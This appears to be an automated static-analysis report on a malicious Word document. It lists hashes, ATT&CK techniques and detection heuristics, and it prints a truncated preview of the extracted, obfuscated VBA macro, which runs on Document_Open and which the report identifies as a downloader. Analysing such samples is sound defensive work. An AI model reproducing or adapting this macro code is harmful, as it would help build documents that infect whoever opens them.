Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e864f9735349e14c…

MALICIOUS

Office (OLE)

186.5 KB Created: 2018-05-21 12:00:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: be9c1ec6f5850ce6b5392152c3883667 SHA-1: 0cd779c9dab0eab81edcbbf204dddd508bf41177 SHA-256: e864f9735349e14c8c4583fe4c29b1b8eab5fca74855476f91e93349b796d818
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The file is an Office document containing a malicious VBA macro, specifically triggered by the Document_Open event. The macro utilizes GetObject and p-code execution, indicating an attempt to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Macro-6539595-0' further supports this assessment. No specific family could be identified, but the behavior is consistent with a macro-based downloader.

Heuristics 6

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 49464 bytes
SHA-256: b5269f6485dab88adb314479c288f0770dfa00883f5fa1a521f91f9260239f3d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub

Private Sub Document_Open()
Dim raveup As Long
Dim catalo As Integer
autoradiographic = "pensee"
inexhaustible = magsman
lazarillo
catostomus = 52 + 9
 Pmt 0, catostomus, 26008, 58110, 6
End Sub
Function assert(pathetically)
Dim bloated As String
Dim baddeleyite As Integer
Dim center As Variant
Dim spinster As Byte
#If (36 - 10 + 374 + 105 - 115 + 310) > ((23 - 14 + 311) - (49 - 58 + 549) * 1) And ((105 - 83 + 6) - (47 - 88 + 69)) * 2 < (Win64) Then
Dim constructive As Variant
Dim ceratosaur As LongPtr
mainframe = 59 - 28 - 23
Dim conventionalism As LongPtr
Dim babar As Long
Dim assail As Integer
Dim dafe As LongPtr
Dim leiopelma As Byte
audita = VarPtr(ceratosaur)
fascicule = currunt(audita, VarPtr(pathetically) + (63 - 20 - 35), mainframe)
#ElseIf (34 - 97 + 463 + 58 - 116 + 358) > ((82 - 67 + 305) - (33 - 83 + 590) * 1) And Not ((88 - 34 - 26) - (22 - 49 + 55)) * 2 < (Win64) Then
Dim ceratosaur As Long
mainframe = 37 - 80 + 47
Dim conventionalism As Long
Dim dafe As Long
audita = VarPtr(ceratosaur)
fascicule = eschscholtzia(audita, VarPtr(pathetically) + (71 - 84 + 21), mainframe)
#End If
savory = 69 - 104 + 34
conventionalism = 25 - 106 + 81
uncertified = 20 - 82 + 62
dafe = 106 - 69 + 9720
giovane = 22 - 92 + 4166
remiform = 39 - 114 + 139
emphysema = underpants(ByVal savory, _
conventionalism, ByVal uncertified, dafe, ByVal giovane, _
ByVal remiform)
pontifical = Fix(246)

demonolatry = bibliographic

#If (48 - 17 + 369 + 98 - 92 + 294) > ((17 - 4 + 307) - (2 - 65 + 603) * 1) And ((98 - 111 + 41) - (83 - 96 + 41)) * 2 < (Win64) Then
restitution = currunt(conventionalism, ceratosaur, 90 - 117 + 5910)
#ElseIf (86 - 119 + 433 + 107 - 76 + 269) > ((111 - 104 + 313) - (83 - 49 + 506) * 1) And Not ((9 - 3 + 22) - (10 - 46 + 64)) * 2 < (Win64) Then
disomatous = eschscholtzia(conventionalism, ceratosaur, 126 - 112 + 5869)
#End If
aloofness = 52 + 44
 Pmt 0, aloofness, 34624, 32256, 5

assert = conventionalism
End Function
Sub lazarillo()
Dim balmy As Integer
Dim airspace As Integer
cacogenesis.bairdiella.Value = Day(#12/5/2013#)
varday = communicational = "colutea"
circulating = "produce"
mated = "avellan"
chaucer = pastry
hoecake = conjecturality

unagitated = "interoceptive"
analecta = "yangtze"
Set bout = cacogenesis.bairdiella.SelectedItem
because = 53 + 46
 Pmt 0, because, 21129, 29989, 6

frankness = bout.Name
doubleshotted = 94 - 10 + 7760
epacridaceae = Right(frankness, doubleshotted)
bestow = bosniaherzegovina.processed(epacridaceae)
plangent = 60 + 10
 Pmt 0, plangent, 11771, 19776, 2

ameliorate = "caraffe"
#If (60 - 102 + 442 + 28 - 102 + 374) > ((125 - 58 + 253) - (122 - 34 + 452) * 1) And ((2 - 17 + 43) - (58 - 16 - 14)) * 2 < (Win64) Then
Dim arrastra As Variant
Dim conclude As LongPtr
Dim aphrodite As LongPtr
Dim archine As Variant
#ElseIf (107 - 13 + 306 + 3 - 121 + 418) > ((19 - 23 + 324) - (63 - 106 + 583) * 1) And Not ((105 - 49 - 28) - (83 - 48 - 7)) * 2 < (Win64) Then
Dim netscape As Variant
Dim aphrodite As Long
Dim lift As Byte
Dim conclude As Long
#End If
thraupidae = 94 - 70 - 24
caryophyllidae = "multidimensional"
challis = 128 - 105 + 4073
goth = 8 + 16
 Pmt 0, goth, 9442, 33585, 7

forbears = "bhadon"
stirringly = "attain"
pulsation = "circuitously"
devoured = 21 + 60
 Pmt 0, devoured, 25229, 13385, 2

outpouring = bestow
cucurbitaceae = beasts
... (truncated)